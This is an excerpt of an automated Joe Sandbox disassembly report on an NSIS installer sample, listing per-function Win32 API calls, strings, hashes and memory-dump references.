                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Char$Next$Prev
                            • String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 589700163-3312408236
                            • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                            • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                            • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                            • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                            APIs
                            • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                            • GetSysColor.USER32(00000000), ref: 00404101
                            • SetTextColor.GDI32(?,00000000), ref: 0040410D
                            • SetBkMode.GDI32(?,?), ref: 00404119
                            • GetSysColor.USER32(?), ref: 0040412C
                            • SetBkColor.GDI32(?,?), ref: 0040413C
                            • DeleteObject.GDI32(?), ref: 00404156
                            • CreateBrushIndirect.GDI32(?), ref: 00404160
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                            • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                            • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                            • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                            APIs
                              • Part of subcall function 73A31215: GlobalAlloc.KERNEL32(00000040,73A31233,?,73A312CF,-73A3404B,73A311AB,-000000A0), ref: 73A3121D
                            • GlobalFree.KERNEL32(?), ref: 73A3259E
                            • GlobalFree.KERNEL32(00000000), ref: 73A325D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: Global$Free$Alloc
                            • String ID:
                            • API String ID: 1780285237-0
                            • Opcode ID: f2f60c32bbb92daeac59836a621709219176288ce7ef6f4704fd79737610055e
                            • Instruction ID: 2aa58f49c6ae5e0c037479bed560f4313d9be29048b2d58ed42f69d866608d7a
                            • Opcode Fuzzy Hash: f2f60c32bbb92daeac59836a621709219176288ce7ef6f4704fd79737610055e
                            • Instruction Fuzzy Hash: FA412672608209EFD302DF54CD97E6A77BAEF8B300B94052EF54683258C7399E05CB61
                            APIs
                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                            • GetMessagePos.USER32 ref: 004049B5
                            • ScreenToClient.USER32(?,?), ref: 004049CF
                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                            • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                            • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                            • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                            APIs
                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C97
                            • MulDiv.KERNEL32(00084C9B,00000064,00084C9F), ref: 00402CC2
                            • wsprintfA.USER32 ref: 00402CD2
                            • SetWindowTextA.USER32(?,?), ref: 00402CE2
                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                            Strings
                            • verifying installer: %d%%, xrefs: 00402CCC
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: verifying installer: %d%%
                            • API String ID: 1451636040-82062127
                            • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                            • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                            • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                            • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                            APIs
                            • GlobalFree.KERNEL32(00000000), ref: 73A32407
                              • Part of subcall function 73A31224: lstrcpynA.KERNEL32(00000000,?,73A312CF,-73A3404B,73A311AB,-000000A0), ref: 73A31234
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73A32382
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73A32397
                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73A323A8
                            • CLSIDFromString.OLE32(00000000,00000000), ref: 73A323B6
                            • GlobalFree.KERNEL32(00000000), ref: 73A323BD
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                            • String ID:
                            • API String ID: 3730416702-0
                            • Opcode ID: 489e482dfbe3cfe296f7db3a74015902564210d16400fbf4543976ff686b96e5
                            • Instruction ID: 9929c434d2c0636bb25cddfd297c61be7263b3c6216fec58829f6012da3d08d5
                            • Opcode Fuzzy Hash: 489e482dfbe3cfe296f7db3a74015902564210d16400fbf4543976ff686b96e5
                            • Instruction Fuzzy Hash: 8A417C71508309DFE315AF65DD42BAAB7F8FB46311F90882FF446C6288D7349545CBA2
                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                            • GlobalFree.KERNEL32(?), ref: 004027EB
                            • GlobalFree.KERNEL32(00000000), ref: 004027FE
                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: a019c31d011b64939239049366c04cc5b7ee72d416c1f9e8157d47185f55a0d4
                            • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
                            • Opcode Fuzzy Hash: a019c31d011b64939239049366c04cc5b7ee72d416c1f9e8157d47185f55a0d4
                            • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                            APIs
                            • lstrlenA.KERNEL32(Inquiring Setup: Installing,Inquiring Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                            • wsprintfA.USER32 ref: 0040492E
                            • SetDlgItemTextA.USER32(?,Inquiring Setup: Installing), ref: 00404941
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s$Inquiring Setup: Installing
                            • API String ID: 3540041739-974742300
                            • Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                            • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                            • Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                            • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                            APIs
                            • GetDC.USER32(?), ref: 00401D9E
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                            • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                            • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectRelease
                            • String ID:
                            • API String ID: 3808545654-0
                            • Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                            • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                            • Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                            • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                            APIs
                            • GetDlgItem.USER32(?), ref: 00401D45
                            • GetClientRect.USER32(00000000,?), ref: 00401D52
                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                            • DeleteObject.GDI32(00000000), ref: 00401D90
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
                            • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                            • Opcode Fuzzy Hash: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
                            • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                            APIs
                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                            • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                            • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                            • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                            APIs
                            • FreeLibrary.KERNEL32(?,75A83410,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
                            • GlobalFree.KERNEL32(007B7D30), ref: 0040375A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Free$GlobalLibrary
                            • String ID: 0}{$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 1100898210-2116383922
                            • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                            • Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
                            • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                            • Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC
                            APIs
                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
                            • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CharPrevlstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2659869361-787714339
                            • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                            • Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
                            • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                            • Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE
                            APIs
                            • DestroyWindow.USER32(00000000,00000000,00402EDF,?), ref: 00402D12
                            • GetTickCount.KERNEL32 ref: 00402D30
                            • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                            • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                            • String ID:
                            • API String ID: 2102729457-0
                            • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                            • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                            • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                            • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                            APIs
                              • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Inquiring Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                              • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                              • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                              • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                            • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
                            • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\), ref: 00405A89
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
